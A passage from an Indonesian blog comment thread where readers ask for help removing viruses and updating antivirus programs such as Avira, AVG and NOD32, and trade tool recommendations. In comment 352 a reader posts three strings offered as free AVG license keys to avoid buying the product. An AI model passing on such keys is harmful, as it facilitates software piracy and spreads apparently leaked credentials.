    mohom pengertian dan bantuannya ya ka,,

    moga terus sukses ka..
    thanx b4

  340. ga ada yg bener anti virus dari download ada’y isi virus

  341. Wah… aku pake Antivir malah Ribet……
    waktu ku apply to all….. eeee malah file-file exe ku kena semua
    busyet… jadi malah nginstall ulang deh…
    cape deeeeee

  342. Mohon bantuannya nihhhh………….. komputerku skrg kena virus terbaru. pa da yang bs ngedelet virusnya…?trims

  343. makashi buanyak bos !!! atas semua nieeeh alx moga2 tambah makin sukses N truslah bekerja untuk sesama khususx para pengguna komputer, btw komputer gue lagi kena virus amburadul N bulubebek semuanya jadi brantakan deh so…dvd rom n printer tak terdekti (terbaca) oleh windows, suara hilang n buanyak lagi …………..please tolong dong ???? trims

  344. @eyang
    hmm.. saya sudah lama tidak mencoba BitDefender, karena ketika mencoba malah crash..

    @darma
    saya kurang tahu dengan masalah tersebut..

    @RUDI
    saya kurang paham maksudnya..
    ( tapi pada antivirus nya hanya bs di lakukan pembuka comandpromt itu menjadi seperti data aslinya )

    @zeze
    sama-sama

    @bin2
    terimakasih

    @yalse
    sepertinya virus lokal dan bisanya antivirus lokal bisa mengatasi

  345. contoh antivirus lokal heeee sorry kurin juga tu ama anti virus lokal

  346. wah dikomputer aye banyak virusnya ni……klo nginstal ulang gimana nya…biar firusnya ilang semua nya ni..????????

  347. mas..minta tolong kasi tau cara update avast yang baik dong?!!cz lo dah update kadang fileX sering error…Thank’s be4 ya…

  348. mas ebta,,

    saya bin2,,

    thanx ya buat avira premiumnya,,

    tapi sekarang aviranya udah mau expired sampai tanggal 10 bulan 4 tahun ini,,
    kan nanti ga bisa di update lagi antivirusnya,,
    saya harus gimana ya mas??

    ada masukkan tidak???

    mohon bimbingannya

    thanx b4

  349. @bin2
    mulai beralih ke versi yang free
    atau jika ingin mungkin dicoba mendapatkan lisensi promosi 6 bulan. Mungkin masih bisa..

  350. tolong post berbagai jenis virus dong!termasuk virus lokal yang susah dideteksi sama antivirus biasa..
    butuh buat tugas sekolah..
    beserta antivirusnya yang cocok untuk virus tersebut.
    thx.

  351. Pingback: Antivirus Terbaik Tahun 2008 |
  352. kyk nya antivirus+++ cuma avg,tp program nya hrs beli,klo g mau beli ini aku punya lecense key nya
    8MEH-RUT9Q-4FS2R-PX2XA-TR3J4-LEMBR-ACED
    8MEH-RF22Z-ANQGS-QDWMR-2FCDN-BEMBR-ACED
    8MEH-RPTGT-KMEL7-EEEVR-KBMRB-LEMBR-ACED

  353. dasar virus…sampe kapan juga kaga bakal ilang…hehehe,
    tapi tenang,kan jagoan mah pasti menang…

  354. Terimakasih mas ebta, jd bnyak pngetahuan masalah software nih setelah aku nemu web ini. N aku juga bnyak ngereferensi buat posting di blogku dari blognya mas ebta. Thanks ya mas?

  355. Pingback: System Volume Information itu Apa? | AdwanSoft
  356. gmn cra donlud anti virus utk (hp)

    N gmn cr nginstalnya?

    tloooooooong ya mas!

  357. tolong minta bimbinganya anti virus yang bagus bg orang yg lagi belajar buka2 internet kayak saya ini apa ya pak…

  358. Pingback: MATERI TARBIYAH » Blog Archive » Tips Update Antivirus : Avira Antivir
  359. antivirus hp yangpaling ampuh itu apa ya…????thx

  360. Pingback: Belajar Bersama. » AntiVirus Terbaik 2008
  361. sy sdh pakai avg gy dia update tp kareana sy sidang dan laptops sy dipakai oleh 10 orang lainnya skrang jdi kena virus.ya bagaimana niatny menolong teman tp skrang susah,klau pkai avg tdk terdeteksi tapi kalau pakai layanan speedy terdeteksi tapi tdk bisa dihilangkan,duh kalu instal tdk ada uangnya .tlng bantu dong,please,mana sy ibu2 yg gabtek lagi,

  362. semua bentuk antivirus suwatu kekuatan nya terletak pada update nya,jika kita pakai antivirus apa pun tetap yg di utamaka yaitu update nya.kalua sudah terinfeksi sama virus ada dua hal kita scan dengan boot disc atau dengan membuka HDD kemudian di scan ke PC yg lain,

  363. coba di scan pakai pcmav terbaru aja… beli majalah pcmedia terbaru atau pinjam sama teman yang punya.

    Bukan promosi koq… tapi untuk menghadapi virus yang banyak beredar di Indonesia, saya akui pcmav-lah yang paling mantap, bisa ngebaca dan membersihkan komputer dari virus tanpa merusak data/file.

    Oia… scannya dari cd-nya aja…
    karena kalo dari hdd atau flashdisk, biasanya pcmavnya sudah tertular dan gak bisa dipake.

    Jangan di-instal ulang dulu kecuali bisa nginstal sendiri… hehehe… semoga membantu.

  364. Pingback: Personal » Blog Archive » Apakah Sebenarnya System Volume Information ?
  365. coba download free antivirus n firewall dari comodo. Nb saat up date pertama kali lakukan pada pagi hari jam 6 saat jalur internet lancar. okey ?

  366. mas ebta cara update nod32 gmn sih??pas dicoba update disruh mskin username sma password,gmn cara mendpatkan pass sama username scara free…mksh

  367. hp saya kayanya kena virus soalnya kadang ada sebagian hurup suka ada yang hilang, mesti pake antivirus gemana????????

  368. Pingback: Tips Update Antivirus : Avira Antivir « Galih karank bawank's Blog
  369. Gmn y cara instal anti virus d hp. Ada gak teman2 yg bs tolongin sy?

Comments are closed.